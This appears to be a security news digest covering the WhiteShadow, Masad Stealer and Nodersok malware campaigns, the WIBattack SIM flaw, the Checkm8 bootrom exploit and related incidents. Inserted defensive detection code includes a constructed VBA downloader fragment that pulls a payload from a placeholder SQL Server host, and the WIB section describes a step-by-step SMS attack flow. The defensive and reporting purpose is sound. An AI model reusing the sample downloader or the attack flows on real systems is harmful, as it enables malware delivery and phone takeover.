Facebook suspends tens of thousands of apps from hundreds of developers
Campbell County Memorial Hospital in Wyoming hit by ransomware attack
Portuguese hacker faces hundreds of Charges in Football Leaks case
Privilege Escalation flaw found in Forcepoint VPN Client for Windows
Thinkful forces a password reset for all users after a data breach
TortoiseShell Group targets IT Providers in supply chain attacks
A new Fancy Bear backdoor used to target political targets
APT or not APT? What’s Behind the Aggah Campaign
Hacker discloses details and PoC exploit code for unpatched 0Day in vBulletin
Microsoft released an out-of-band patch to fix Zero-day flaw exploited in the wild
North Korea-linked malware ATMDtrack infected ATMs in India
Adobe Patches two critical vulnerabilities in ColdFusion
Czech Intelligence's report attributes major cyber attack to China
Heyyo dating app left its users data exposed online
US Utilities Targeted with LookBack RAT in a new phishing campaign
Airbus suppliers were hit by four major attacks in the last 12 months
Botnet exploits recent vBulletin flaw to protect its bots
Emsisoft releases a free decryptor for the WannaCryFake ransomware
Study shows connections between 2000 malware samples used by Russian APT groups
USBsamurai for Dummies: How To Make a Malicious USB Implant & Bypass Air-Gapped Environments for 10$. The Dumb-Proof Guide.
Checkm8: unpatchable iOS exploit could lead to permanent jailbreak for iOS devices running A5 to A11 chips
DoorDash Data Breach exposes data of approximately 5 million users
Emsisoft released a new free decryption tool for the Avest ransomware
Magecart 5 hacker group targets L7 Routers
After SIMJacker, WIBattack hacking technique disclosed. Billions of users at risk
German police arrest suspects in raid network hosting Darknet marketplaces
Malware-based attacks disrupted operations of Rheinmetall AG and Defence Construction Canada
Nodersok malware delivery campaign relies on advanced techniques

Pierluigi Paganini

(SecurityAffairs – newsletter)


WhiteShadow downloader leverages Microsoft SQL to retrieve multiple malware

Researchers at Proofpoint have spotted a piece of downloader, dubbed WhiteShadow, that leverages Microsoft SQL queries to pull and deliver malicious payloads. 

In August, malware researchers at Proofpoint spotted a new downloader which is being used to deliver a variety of malware via Microsoft SQL queries. The experts detected new Microsoft Office macros, which collectively act as a staged downloader, and tracked it as WhiteShadow.

Initially the downloader was involved in a small campaign aimed at distributing the Crimson RAT; over time, researchers observed the implementation of detection evasion techniques.

“In August 2019, the macros that make up WhiteShadow appeared in English-language cleartext. The only observed obfuscation technique was in the simple case altering of strings such as “Full_fILE” or “rUN_pATH.” In early September, we observed slight misspellings of certain variables such as “ShellAppzz.Namespace(Unzz).” Mid-September brought another change in macro code using reversed strings such as “StrReverse(“piz.Updates\stnemucoD\”)”.” reads the analysis published by Proofpoint.

“The most recently observed versions of the WhiteShadow macros contain long randomized text strings such as “skjfhskfhksfhksfhksjfh1223sfsdf.eDrAerTerAererer”.”

Experts believe that WhiteShadow is one component of a malware delivery service that includes a rented instance of Microsoft SQL Server to host various payloads retrieved by the downloader. Experts observed the downloader in campaigns spreading Crimson RAT, Agent Tesla, AZORult, and multiple keyloggers.

The macros observed in the campaigns, once enabled, execute SQL queries to retrieve the malicious code, stored as ASCII-encoded strings, from Microsoft SQL Server databases controlled by threat actors.

The result of the query is written to disk as a PKZip archive of a Windows executable. 

“WhiteShadow uses a SQLOLEDB connector to connect to a remote Microsoft SQL Server instance, execute a query, and save the results to a file in the form of a zipped executable. The SQLOLEDB connector is an installable database connector from Microsoft but is included by default in many (if not all) installations of Microsoft Office.” continues the report.

“Once extracted by the macro, the executable is run on the system to start installing malware, which is determined by the actor based on the script configuration stored in the malicious Microsoft Office attachments.”


Proofpoint warns that the Microsoft SQL technique is still a rarity in the threat landscape, but threat actors could increasingly adopt it in future campaigns. 
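Static indicators for the macro behaviour described above, as an added example that is not Proofpoint's or Security Affairs' code. It scans VBA macro text for an ADODB connection through the SQLOLEDB provider, undoes `StrReverse()` obfuscation, and pulls out the `Data Source` a hunter would block or search proxy and firewall logs for. Both macro samples are constructed; the `203.0.113.10` address is a documentation-range placeholder.

```python
"""Static triage of WhiteShadow-style macro downloaders (added example)."""
from __future__ import annotations
import re

# Constructed fragment modelled on the indicators quoted in the report.
SAMPLE_MACRO = r'''
Set cn = CreateObject("ADODB.Connection")
cn.Open "Provider=SQLOLEDB;Data Source=203.0.113.10,1433;User ID=u;Password=p"
Set rs = cn.Execute("SELECT c FROM t")
Set ShellAppzz = CreateObject("Shell.Application")
Set Unzz = ShellAppzz.Namespace(StrReverse("piz.Updates\stnemucoD\"))
'''

# Constructed benign macro: ADO against a local Access file, no obfuscation.
BENIGN_MACRO = r'''
Set cn = CreateObject("ADODB.Connection")
cn.Open "Provider=Microsoft.ACE.OLEDB.12.0;Data Source=C:\reports\sales.accdb"
'''

INDICATORS = {
    "sqloledb_provider": re.compile(r"Provider\s*=\s*SQLOLEDB", re.I),
    "ado_connection": re.compile(r'CreateObject\("ADODB\.Connection"\)', re.I),
    "shell_namespace": re.compile(r"Shell\.Application", re.I),  # used to unzip the result
    "strreverse": re.compile(r"StrReverse\(", re.I),
}
STRREVERSE_LITERAL = re.compile(r'StrReverse\("([^"]*)"\)', re.I)
DATA_SOURCE = re.compile(r"Data Source\s*=\s*([^;\"]+)", re.I)


def find_indicators(macro: str) -> list[str]:
    """Names of the indicator patterns present in the macro text."""
    return [name for name, rx in INDICATORS.items() if rx.search(macro)]


def decode_reversed_strings(macro: str) -> list[str]:
    """Plaintext of every StrReverse("...") literal, for triage."""
    return [s[::-1] for s in STRREVERSE_LITERAL.findall(macro)]


def remote_sql_servers(macro: str) -> list[str]:
    """Data Source values (host,port) of SQLOLEDB connection strings."""
    if not INDICATORS["sqloledb_provider"].search(macro):
        return []
    return [m.group(1).strip() for m in DATA_SOURCE.finditer(macro)]


def is_suspicious(macro: str) -> bool:
    """Remote SQL Server pull combined with archive handling or string obfuscation."""
    hits = set(find_indicators(macro))
    return "sqloledb_provider" in hits and bool(hits & {"shell_namespace", "strreverse"})
```

An ADODB connection on its own is common in legitimate macros, which is why `is_suspicious` requires the SQLOLEDB provider together with either the Shell.Application unzip step or reversed strings; the benign sample trips only the first indicator.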

Pierluigi Paganini

(SecurityAffairs – WhiteShadow, malware)


Masad Stealer Malware exfiltrates data via Telegram

Experts at Juniper Threat Labs have discovered a new piece of malware dubbed Masad Stealer that exfiltrates cryptocurrency wallet files via Telegram.

Security researchers at Juniper Threat Labs discovered a strain of malware dubbed Masad Stealer that is being actively distributed. The malware can steal files, browser information, and cryptocurrency wallet data and send them to the botmasters via Telegram.

“The malware is being advertised on black market forums as “Masad Clipper and Stealer”. It steals browser data, which might contain usernames, passwords and credit card information. Masad Stealer also automatically replaces cryptocurrency wallets from the clipboard with its own.” reads the analysis published by the experts.

“Masad Stealer sends all of the information it collects – and receives commands from – a Telegram bot controlled by the threat actor deploying that instance of Masad. Because Masad is being sold as off-the-shelf malware, it will be deployed by multiple threat actors who may or may not be the original malware writers.”

Masad Stealer is written in AutoIt and compiled into a Windows executable. The size of most of the samples analyzed by the experts was about 1.5 MiB, but the experts noted that larger executables can be found bundled into other applications.

The malware appears to be linked to another threat dubbed “Qulab Stealer”. 

Crooks are advertising the malware on hacking forums as a stealer and clipper, the ‘fully-featured’ variant is offered for sale at $85.

Masad Stealer is distributed by masquerading as a legitimate tool or by bundling it into third-party tools, such as CCleaner and ProxySwitcher.

Attackers attempt to trick users into downloading the malware by advertising it in forums, on third party download sites or on file sharing sites.

Victims can also get infected by installing tainted versions of popular software, game cracks, and cheats.

Once it has infected a machine, Masad Stealer collects a wide range of data, including system info, screenshots, desktop text files, Steam Desktop Authenticator sessions, cryptocurrency wallets, browser cookies, usernames, passwords, and credit card data stored in browsers.

Masad Stealer is also able to automatically replace Monero, Bitcoin Cash, Litecoin, Neo, and Web Money wallet addresses in the clipboard with its own.

The malware achieves persistence by creating a scheduled task on all Windows devices it manages. 

Once the malware has collected the information from the victim's computer, it zips it using a 7zip executable bundled within its binary, then exfiltrates the data to the command and control (C2) server using unique Telegram bot IDs.
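A host-side heuristic for the clipboard "clipper" behaviour described above, as an added example that is not Juniper's or Security Affairs' code. It assumes a hypothetical endpoint agent that records every clipboard change as a timestamped string; a clipper rewrites the clipboard within milliseconds of the user copying a wallet address, whereas a person rarely copies two different addresses of the same coin within a couple of seconds. The events and addresses below are constructed (syntactically valid placeholders, not real wallets), and only Bitcoin and Litecoin address shapes are modelled.

```python
"""Clipboard-hijack ("clipper") heuristic for Masad-style wallet swapping (added example)."""
from __future__ import annotations
import re
from dataclasses import dataclass

# Address shapes for two of the coin families; Base58 excludes 0, O, I and l.
ADDRESS_PATTERNS = {
    "bitcoin": re.compile(r"^(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[a-z0-9]{39,59})$"),
    "litecoin": re.compile(r"^(?:[LM][a-km-zA-HJ-NP-Z1-9]{26,33}|ltc1[a-z0-9]{39,59})$"),
}


@dataclass(frozen=True)
class ClipEvent:
    ts: float    # seconds, as reported by the hypothetical clipboard-monitoring agent
    text: str


def classify(text: str) -> str | None:
    """Address family a clipboard string looks like, or None for ordinary text."""
    t = text.strip()
    return next((name for name, rx in ADDRESS_PATTERNS.items() if rx.match(t)), None)


def detect_clipboard_swaps(events: list[ClipEvent], window: float = 2.0) -> list[dict]:
    """Flag an address replaced by a different address of the same family within `window` seconds."""
    alerts = []
    prev_ev, prev_kind = None, None
    for ev in sorted(events, key=lambda e: e.ts):
        kind = classify(ev.text)
        if (prev_kind is not None and kind == prev_kind
                and ev.text.strip() != prev_ev.text.strip()
                and ev.ts - prev_ev.ts <= window):
            alerts.append({"family": kind, "original": prev_ev.text,
                           "replacement": ev.text, "delta_s": round(ev.ts - prev_ev.ts, 3)})
        prev_ev, prev_kind = ev, kind
    return alerts


# Constructed event stream: one hijack, then ordinary activity.
SAMPLE_EVENTS = [
    ClipEvent(10.0, "1ConstructedAddressExamp1eUseXn1y"),   # user copies the intended payee
    ClipEvent(10.3, "1AttackerContro11edAddrExamp1eXyz"),   # overwritten 300 ms later
    ClipEvent(25.0, "meeting notes"),
    ClipEvent(40.0, "LConstructedLitecoinAddrExamp1eXy"),
    ClipEvent(70.0, "LAnotherLitecoinAddrExamp1eXyzab"),    # 30 s later: plausibly the user
]
```

The time window is the whole heuristic: the same two addresses 30 seconds apart are treated as normal use, so the rule produces one alert for the sample stream. A real deployment would also correlate the writing process, since the clipper is a process other than the one the user copied from.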

The analysis of unique Telegram bot IDs and usernames associated to the malware allowed the experts to determine that there are at least 18 threat actors or campaigns actively targeting potential victims with the Masad Stealer.

“Of the more than 1,000 samples we identified to be variants of this malware, there were 338 unique Telegram Command and Control bot IDs. From this data, we can estimate the number of threat actors – or at least the number of different campaigns being run using the Masad Stealer malware – and the size of their operations.” continues the report.

Juniper Threat Labs pointed out that Masad Stealer is an active threat and the malicious code is still available for purchase on the black market.

Experts also published a list of indicators of compromise (IOCs) with malware sample hashes and domains involved in the attacks.

Pierluigi Paganini

(SecurityAffairs – hacking, malware)


Nodersok malware delivery campaign relies on advanced techniques

Microsoft researchers observed a campaign delivering malware, dubbed Nodersok, relying on advanced techniques and elusive network infrastructure.

Microsoft experts observed a malware campaign, tracked as Nodersok, relying on advanced techniques and elusive network infrastructure. Microsoft uncovered the campaign in mid-July when it noticed patterns in the anomalous usage of MSHTA.exe.

Nodersok abuses legitimate tools, also called living-off-the-land binaries (LOLBins). Researchers observed threat actors dropping two legitimate tools onto the infected machines, namely Node.exe, the Windows implementation of the popular Node.js framework, and WinDivert, a network packet capture and manipulation utility.

“It’s not uncommon for attackers to download legitimate third-party tools onto infected machines (for example, PsExec is often abused to run other tools or commands).” reads the analysis published by Microsoft. “However, Nodersok went through a long chain of fileless techniques to install a pair of very peculiar tools with one final objective: turn infected machines into zombie proxies.”

The Nodersok campaign has already infected thousands of machines in the last several weeks. Most of the victims are located in the United States and Europe and are predominantly consumers. About 3% of the infected systems belong to organizations in different sectors, including education, professional services, healthcare, finance, and retail.


The attack chain starts when the user runs an HTML Application (HTA) that is likely delivered through compromised advertisements. The JavaScript code in the HTA file downloads a second-stage component that launches PowerShell.

The Powershell command downloads additional components. One of the second-stage instances of PowerShell downloads the legitimate node.exe tool, while another drops WinDivert packet capture library components.

Another PowerShell component runs a shellcode to use WinDivert for the filtering and modification of certain outgoing packets.

The final payload turns the infected machine into a proxy.

The attackers use the WinDivert tool to intercept packets sent out to initiate a TCP connection and modify them in a manner that likely benefits the attackers.
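Two detections for the chain described above, as an added example that is not Microsoft's or Security Affairs' code. It assumes process-creation records (pid, parent pid, image path) and driver-load paths of the kind a Sysmon or EDR agent produces; every record below is constructed, and "SomeVPN" stands for a hypothetical product that legitimately ships the WinDivert driver. The first check flags `node.exe` whose ancestry runs `mshta.exe` then `powershell.exe` (gaps allowed, since the campaign chains several PowerShell stages); the second flags a WinDivert driver loaded from anywhere but an allowlisted install directory.

```python
"""Process-chain and driver-load heuristics for Nodersok-style LOLBin abuse (added example)."""
from __future__ import annotations
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str


LOLBIN_CHAIN = ("mshta.exe", "powershell.exe", "node.exe")


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def ancestry(pid: int, procs: dict[int, Proc]) -> list[str]:
    """Image basenames from the oldest known ancestor down to `pid` (cycle-safe)."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        chain.append(_basename(procs[pid].image))
        pid = procs[pid].ppid
    return chain[::-1]


def contains_in_order(chain: list[str], pattern: tuple[str, ...]) -> bool:
    """True if every pattern element occurs in `chain` in order, gaps allowed."""
    it = iter(chain)
    return all(any(name == wanted for name in it) for wanted in pattern)


def find_lolbin_chains(procs: dict[int, Proc]) -> list[int]:
    """PIDs of node.exe instances descended from mshta.exe via powershell.exe."""
    return sorted(p.pid for p in procs.values()
                  if _basename(p.image) == LOLBIN_CHAIN[-1]
                  and contains_in_order(ancestry(p.pid, procs), LOLBIN_CHAIN))


def unexpected_windivert_loads(driver_paths: list[str], allowed_dirs: set[str]) -> list[str]:
    """WinDivert driver images loaded from outside an allowlisted install directory."""
    return [p for p in driver_paths
            if _basename(p).startswith("windivert")
            and str(PureWindowsPath(p).parent).lower() not in allowed_dirs]


# Constructed process tree: one malicious chain and one developer running node.
SAMPLE_PROCS = {p.pid: p for p in [
    Proc(4, 1, r"C:\Windows\explorer.exe"),
    Proc(100, 4, r"C:\Windows\System32\mshta.exe"),
    Proc(200, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    Proc(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    Proc(400, 300, r"C:\Users\victim\AppData\Local\Temp\node.exe"),
    Proc(500, 4, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    Proc(600, 500, r"C:\Program Files\nodejs\node.exe"),
]}

# Constructed driver-load paths; the allowlist entry is hypothetical.
SAMPLE_DRIVER_LOADS = [
    r"C:\Program Files\SomeVPN\WinDivert64.sys",
    r"C:\Users\victim\AppData\Local\Temp\WinDivert64.sys",
]
ALLOWED_WINDIVERT_DIRS = {r"c:\program files\somevpn"}
```

Because node.exe and WinDivert are both legitimate and signed, neither file hash nor signer is a useful signal; the lineage and the load path are what separate the campaign's use from a developer's or a VPN product's, which is the point Microsoft makes about file-based signatures.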

“Both the distributed network infrastructure and the advanced fileless techniques allowed this campaign to fly under the radar for a while, highlighting how having the right defensive technologies is of utmost importance in order to detect and counter these attacks in a timely manner.” Microsoft concludes.

“If we exclude all the clean and legitimate files leveraged by the attack, all that remains are the initial HTA file, the final Node.js-based payload, and a bunch of encrypted files. Traditional file-based signatures are inadequate to counter sophisticated threats like this.”

Pierluigi Paganini

(SecurityAffairs – Nodersok, hacking)


German police arrest suspects in raid network hosting Darknet marketplaces

German police have shut down a network hosting Darknet marketplaces focused on the trading of drugs, stolen data and child pornography.

German police announced that they have shut down a network hosting Darknet black marketplaces trading drugs, stolen data, and child pornography.

The black marketplaces were also offering stolen data and fake documents, and other illegal goods.

Authorities conducted an investigation on the operators of the “Bulletproof Hoster” service that was provided through servers hidden in a former NATO bunker, the so-called “Cyber Bunker.”

Law enforcement arrested seven suspects in a series of raids: four Dutch citizens, two Germans and one Bulgarian.

“Thursday’s raids involved hundreds of officers and came after years of following up on leads in cooperation with other agencies. Police believe that the data center was involved in a hack attack three years ago on the national communications provider, Telekom.” reported the DW agency.

“Officials said the server seized on Thursday had also hosted the second-largest darknet trading platform, Wall Street Market.  Authorities in the European Union and the US shut that platform down in May, claiming it was used to traffick stolen data, forged documents, computer malware and illicit drugs.”

According to prosecutors, the criminal ring behind the illegal network was composed of at least thirteen members, 12 men and one woman, aged from 20 to 59. The suspects ran the powerful servers inside the former NATO bunker in the town of Traben-Trarbach in Rhineland-Palatinate state.

The operation involved hundreds of police agents in Germany and other European countries; they seized 200 servers, numerous data carriers and mobile phones, and a large sum of cash.

The police also confirmed that the popular “Wall Street Market” black marketplace was hosted on the seized server. In May, the German police, with the support of Europol, Dutch police and the FBI, shut down one of the world's largest black marketplaces on the dark web, the ‘Wall Street Market,’ and arrested three operators allegedly running it. The three German suspects were arrested on April 23 and 24 in the states of Hesse, Baden-Wuerttemberg and North Rhine-Westphalia.

The operation also led to the arrest of two major suppliers of illegal narcotics in the United States.

Prosecutors also revealed that the same cyber bunker was used to host the C2 behind a botnet involved in a massive attack that hit the German provider Deutsche Telekom in November 2016.

Pierluigi Paganini

(SecurityAffairs – darknet, hacking)


Malware-based attacks disrupted operations of Rheinmetall AG and Defence Construction Canada

A series of cyber attacks hit the defense contractors Rheinmetall AG and Defence Construction Canada (DCC) causing the disruption of their information technology systems.

This month a series of cyber attacks hit the defense contractors Rheinmetall AG and Defence Construction Canada (DCC), disrupting their information technology systems.

German Rheinmetall AG is a market leader in the supply of military technology; in 2019 the group generated sales of $6.9 billion. DCC is a Crown corporation that delivers infrastructure and environmental projects for the defence of Canada.

Malware-based attacks have hit the IT infrastructure of Rheinmetall Automotive plants in Brazil, Mexico, and the USA since late on the evening of 24 September 2019.

The attacks impacted the production processes at these plants causing significant disruption.

“The IT infrastructure of Rheinmetall Automotive plants in Brazil, Mexico and the USA has been affected by malware attacks since late on the evening of 24 September 2019. As a result, normal production processes at these locations are currently experiencing significant disruption.” reads a press release published by the company.

“According to the latest information, the Group’s other IT systems have not been affected.”

Rheinmetall AG claims it is doing everything in its power to address the resulting disruption.

The company said that deliverability is assured in the short term, but at this time it is not possible to predict the length of the disruption.

“The most likely scenarios suggest a period lasting between two and four weeks.” continues the press release. “As things stand, the Group expects the malware event to have an adverse impact on operating results of between €3 million and €4 million per week starting with week two.”

Early this month, a cyberattack also disrupted the information technology systems of Defence Construction Canada.

“The Crown Corporation that manages Defence department projects and infrastructure has been hit with a cyber-attack.” reported the Ottawa Sun.

“Industry sources say an attack earlier this month disrupted Defence Construction Canada’s computer systems and has led to ongoing issues with procurement and other projects.”

DCC is still working to restore its IT systems and has launched an investigation into the cyber attack; the organization pointed out that there are no delays to the projects it is managing on behalf of DND.

“All DCC site offices across Canada are open and work has continued on all projects that DCC is managing on behalf of DND and its other clients, she noted in an email.” continues the post.

“There are no delays to projects that DCC is managing on behalf of DND due to this incident,” said Stephanie Ryan, director of communications with Defence Construction Canada.

At this time there are no technical details about either cyber attack; experts believe that the systems were infected by ransomware, which caused the disruption of internal operations.

Pierluigi Paganini

(SecurityAffairs – Rheinmetall, hacking)


After SIMJacker, WIBattack hacking technique disclosed. Billions of users at risk

Researchers are warning of a new variant of recently disclosed SimJacker attack, dubbed WIBattack, that could expose millions of mobile phones to remote hacking.

WIBattack is a new variant of the recently discovered Simjacker attack method that could expose millions of mobile phones to remote hacking.

A couple of weeks ago, cybersecurity researchers at AdaptiveMobile Security disclosed a critical vulnerability in SIM cards dubbed SimJacker that could be exploited by remote attackers to compromise targeted mobile phones and spy on victims just by sending an SMS.

The SimJacker vulnerability resides in the S@T (SIMalliance Toolbox) Browser dynamic SIM toolkit that is embedded in most SIM cards used by mobile operators in at least 30 countries. The experts discovered that the exploitation of the vulnerability is independent of the model of phone used by the victim.

The scary part of the story is that a private surveillance firm has been aware of the zero-day flaw for at least two years and has been actively exploiting the SimJacker vulnerability to spy on mobile users in several countries.

Following the disclosure of the Simjacker attack, the researcher Lakatos from Ginno Security Lab discovered that another dynamic SIM toolkit, called Wireless Internet Browser (WIB), can be exploited in a similar way.

Lakatos first discovered this vulnerability back in 2015, but he did not publicly disclose it because the flaw is hard to patch and could be abused by threat actors to remotely take over phones running vulnerable SIMs.

“We researched security in simcard and discovered the vulnerability in WIB simcard-browser that causes serious harm to hundreds of millions of telecom subscribers worldwide in 2015, and the vulnerability has not ever been published yet.” reads a blog post published by the researcher.

“By sending a malicious SMS to the victim's phone number, an attacker can abuse the vulnerabilities in the WIB SIM browser to remotely take control of the victim's mobile phone to perform harmful actions such as: send SMS, make phone calls, get the victim's location, launch other browsers (e.g. WAP browser), get the victim's IMEI, etc.”

The researcher also claimed to have discovered the flaw in S@T Browser and disclosed a video PoC of the Simjacker with details that have not yet been published by AdaptiveMobile Security researchers.

The flaw in both S@T and WIB Browsers can be exploited to perform several malicious tasks by sending an SMS containing a spyware-like code.

Back to WIBattack: the WIB toolkit was created by SmartTrust, a company that provides SIM toolkit-based browsing solutions to hundreds of mobile operators worldwide, including AT&T, Etisalat, KPN, T-Mobile, Telenor, and Vodafone.

Like the S@T Browser, the WIB toolkit has been designed to allow mobile carriers to provide some essential services, subscriptions, and value-added services over-the-air to their customers. It also allows changing core network settings on their devices.

“OTA is based on client/server architecture where at one end there is an operator back-end system (customer care, billing system, application server…) and at the other end there is a SIM card,” continues the researcher.

The flaw in the WIB toolkit could be exploited to:

  • Retrieve the target device's location and IMEI
  • Send fake messages on behalf of victims
  • Distribute malware by launching the victim's phone browser and visiting a malicious web page
  • Dial premium-rate numbers
  • Call the attacker's phone number to spy on victims' surroundings via the device's microphone
  • Perform denial of service attacks by disabling the SIM card
  • Retrieve target device info (e.g. language, radio type, battery level, etc.)

Below is the attack scenario described by the expert:

[Figure: WIBAttack attack scenario]

(1) The attacker sends a malicious OTA SMS to the victim's phone number. The OTA SMS contains WIB commands such as: SETUP CALL, SEND SMS, PROVIDE LOCATION INFO, etc.

(2) Right after receiving the OTA SMS, the baseband operating system of the victim's mobile phone uses the ENVELOPE COMMAND (an APDU command to communicate between the mobile phone and the SIM card) to forward the TPDU of the OTA SMS to the WIB browser in the victim's SIM card. Different from the procedure for receiving a normal text SMS, the OTA SMS procedure is silently handled in the baseband operating system and does not raise any alert to the application operating system (Android OS, iOS, BlackBerry OS, ...). Neither feature phones nor smartphones raise an alert about the OTA SMS procedure: no ringing, no vibration, no detection by users.

(3) The WIB browser follows the WIB commands inside the TPDU of the OTA SMS and sends the corresponding PROACTIVE COMMAND to the victim's mobile phone, such as: SETUP CALL, SEND SMS, PROVIDE LOCATION INFO.

(4) The victim's mobile phone follows the PROACTIVE COMMAND received from the victim's SIM card to perform the corresponding actions, such as: make a phone call, send an SMS to whatever phone number the attacker wants (e.g. the receiver mobile phone in the figure).

The researcher published a video PoC of the attack:

Lakatos shared his findings on WIBAttack with the GSM Association (GSMA).

In summary, at least two hacking techniques leverage vulnerabilities in a component of most SIM cards on the market, potentially exposing billions of mobile users to attacks.

The researcher announced that he is working on a mobile phone app that would allow users to scan their SIM cards to determine if they are vulnerable to the Simjacker attack.

The researchers at SRLabs also developed an Android app, named SnoopSnitch, that can detect Simjacker-like attacks. The SnoopSnitch app only runs on rooted Android mobile phones with a Qualcomm chipset.

“The SnoopSnitch Android app warns users about binary SMS attacks including Simjacker since 2014. (Attack alerting requires a rooted Android phone with Qualcomm chipset.)” reported SRLabs.
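The header-level check behind "binary SMS" alerting of the kind SnoopSnitch performs, as an added example that is not Ginno Security Lab's, SRLabs' or Security Affairs' code. It parses an SMS-DELIVER PDU in the 3GPP TS 23.040 layout a modem hands over and flags the two markers that route a message to the SIM instead of to the user: TP-PID 0x7F ((U)SIM data download) and a TP-DCS message class of 2 (SIM-specific, per TS 23.038). Both PDUs below are constructed; the user data bytes are filler, not a real OTA command.

```python
"""Flag SIM-targeted (OTA) SMS-DELIVER PDUs on the channel WIBattack and Simjacker use (added example)."""
from __future__ import annotations

SIM_DATA_DOWNLOAD_PID = 0x7F   # TS 23.040: (U)SIM Data download


def _swap_nibbles(hexstr: str) -> str:
    return "".join(hexstr[i + 1] + hexstr[i] for i in range(0, len(hexstr), 2))


def dcs_message_class(dcs: int) -> int | None:
    """Message class 0-3 if the TP-DCS octet carries one, else None (TS 23.038)."""
    group = dcs >> 4
    if group == 0xF or ((group & 0xC) == 0 and dcs & 0x10):
        return dcs & 0x03
    return None


def dcs_is_8bit(dcs: int) -> bool:
    """True for 8-bit (binary) user data, False for GSM 7-bit / UCS-2."""
    group = dcs >> 4
    if group == 0xF:
        return bool(dcs & 0x04)
    if (group & 0xC) == 0:
        return (dcs & 0x0C) == 0x04
    return False


def parse_sms_deliver(pdu_hex: str) -> dict:
    """Minimal SMS-DELIVER parser: sender, TP-PID, TP-DCS, class and raw user data."""
    data = bytes.fromhex(pdu_hex)
    i = 0
    i += 1 + data[i]                       # SMSC address length byte + address
    first = data[i]; i += 1
    if first & 0x03 != 0:                  # TP-MTI 00 = SMS-DELIVER
        raise ValueError("not an SMS-DELIVER PDU")
    oa_len, toa = data[i], data[i + 1]; i += 2
    oa_bytes = (oa_len + 1) // 2           # digits are packed two per octet, 'F' padded
    digits = _swap_nibbles(data[i:i + oa_bytes].hex()).rstrip("f")
    i += oa_bytes
    sender = ("+" if (toa & 0x70) == 0x10 else "") + digits
    pid, dcs = data[i], data[i + 1]; i += 2
    i += 7                                 # TP-SCTS timestamp, not needed here
    udl = data[i]; i += 1
    ud_len = udl if dcs_is_8bit(dcs) else (udl * 7 + 7) // 8   # UDL counts septets for GSM-7
    return {"sender": sender, "pid": pid, "dcs": dcs,
            "message_class": dcs_message_class(dcs), "user_data": data[i:i + ud_len]}


def is_sim_targeted(pdu_hex: str) -> bool:
    """Alert condition: message addressed to the SIM's data-download path or class 2."""
    msg = parse_sms_deliver(pdu_hex)
    return msg["pid"] == SIM_DATA_DOWNLOAD_PID or msg["message_class"] == 2


# Constructed PDUs (no SMSC, sender +12345678901). The first carries PID 0x7F and
# DCS 0xF6 (8-bit, class 2) with filler bytes; the second is a plain GSM-7 "hello".
SIM_DATA_DOWNLOAD_PDU = "00040B912143658709F17FF69190929121500004DEADBEEF"
PLAIN_TEXT_PDU = "00040B912143658709F100009190929121500005E8329BFD06"
```

This is only the header check: it says a message was steered to the SIM, not what the SIM did with it. On a handset the baseband consumes such messages before the application OS sees them, which is why SnoopSnitch needs root and a chipset whose diagnostics expose the raw PDU.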

Pierluigi Paganini

(SecurityAffairs – WIBattack, hacking)


Checkm8: unpatchable iOS exploit could lead to permanent jailbreak for iOS devices running A5 to A11 chips

A security expert has released a new jailbreak, dubbed Checkm8, that impacts all iOS devices running on A5 to A11 chipsets; it works on iPhone models from the 4S to the 8 and X.

The security expert Axi0mX has released a new jailbreak, dubbed Checkm8, that works on all iOS devices running on A5 to A11 chipsets. The jailbreak works with all Apple products released between 2011 and 2017, including iPhone models from 4S to 8 and X.

Checkm8 leverages vulnerabilities in the Apple Bootrom (secure boot ROM) to achieve full control over the device.

“The bootrom (called “SecureROM” by Apple) is the first significant code that runs on an iDevice. The bootrom is read-only. Finding exploits in the bootrom level is a big achievement since Apple won’t be able to fix it without a hardware revision.” reads a description for the BootRom.

The expert who devised Checkm8 described it as “a permanent unpatchable bootrom exploit”; however, it is essential to highlight that the exploit could lead to a jailbreak only when chained with other flaws.

Bootrom exploits are very dangerous because they are permanent and can't be addressed via software; in order to patch a Bootrom flaw it is necessary to physically modify the chipsets.

Axi0mX's jailbreak code is marked as a “beta” release, but there is the concrete possibility that expert coders or intelligence agencies will integrate it into hacking tools and malware.

“What I am releasing today is not a full jailbreak with Cydia, just an exploit. Researchers and developers can use it to dump SecureROM, decrypt keybags with AES engine, and demote the device to enable JTAG. You still need additional hardware and software to use JTAG.” wrote the expert.

“Features the exploit allow include:

  • Jailbreak and downgrade iPhone 3GS (new bootrom) with alloc8 untethered bootrom exploit. 🙂
  • Pwned DFU Mode with steaks4uce exploit for S5L8720 devices.
  • Pwned DFU Mode with limera1n exploit for S5L8920/S5L8922 devices.
  • Pwned DFU Mode with SHAtter exploit for S5L8930 devices.
  • Dump SecureROM on S5L8920/S5L8922/S5L8930 devices.
  • Dump NOR on S5L8920 devices.
  • Flash NOR on S5L8920 devices.
  • Encrypt or decrypt hex data on a connected device in pwned DFU Mode using its GID or UID key.”

Currently, the jailbreak does not work on Apple’s latest two A12 and A13 chipsets.

Experts pointed out that the jailbreak needs physical access to the device, so it cannot be used remotely.

“During iOS 12 betas in summer 2018, Apple patched a critical use-after-free vulnerability in iBoot USB code. This vulnerability can only be triggered over USB and requires physical access. It cannot be exploited remotely. I am sure many researchers have seen that patch.” concludes the expert.

“That’s how I discovered it. It is likely at least a couple other researchers were able to exploit this vulnerability after discovering the patch. The patch is easy to find, but the vulnerability is not trivial to exploit on most devices.”

Pierluigi Paganini

(SecurityAffairs – Checkm8, hacking)


Magecart 5 hacker group targets L7 Routers

IBM researchers observed one of the Magecart groups using malicious code designed for injection into commercial-grade layer 7 (L7) routers.

IBM X-Force Incident Response and Intelligence Services (IRIS) experts observed that one of the Magecart groups, tracked as MG5, is using malware to inject into commercial-grade L7 routers.

The experts believe the hackers are likely testing malicious code designed for injection into benign JavaScript files loaded by L7 routers that are typically used by airports, casinos, hotels, and resorts. According to IBM, the threat actors are currently targeting users shopping on U.S. and Chinese websites.

The experts discovered that the Magecart hackers are able to inject a credit card skimmer into a popular open-source JavaScript library that websites use to ensure wide compatibility with mobile browsing.

